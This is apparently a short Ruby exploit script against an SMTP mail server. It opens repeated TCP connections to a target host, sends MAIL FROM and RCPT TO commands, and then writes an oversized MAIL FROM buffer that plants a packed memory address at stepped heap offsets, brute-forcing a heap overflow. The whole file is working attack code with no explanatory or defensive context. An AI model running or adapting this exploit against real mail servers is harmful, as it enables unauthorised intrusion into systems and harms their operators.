require 'socket'

targeth = ARGV[0] || '193.168.50.89'
targetp = ARGV[1] || 25

addrzero = 0x4090bc

-40.step(100, 4) { |mallocoffset|
	puts "trying #{mallocoffset}"

TCPSocket.open(targeth, targetp) { |sock|
	sock.gets
	sock.write "MAIL FROM:bruuuuute\r\n"
	sock.gets
	sock.write "RCPT TO:fooooorce\r\n"
	sock.gets
	
	mailfrom = "X"*140
	mailfrom[40+mallocoffset,4] = [addrzero-40].pack('L')
	sock.write "MAIL FROM:" + mailfrom + "\r\n"
	sock.gets
	puts "sending rcpt"
	sock.write "RCPT TO:foobar\r\n"
	if IO.select([sock], nil, nil, 1)
		puts "Got answer !"
		puts sock.gets
	else
		puts "Timeout"
	end
}
}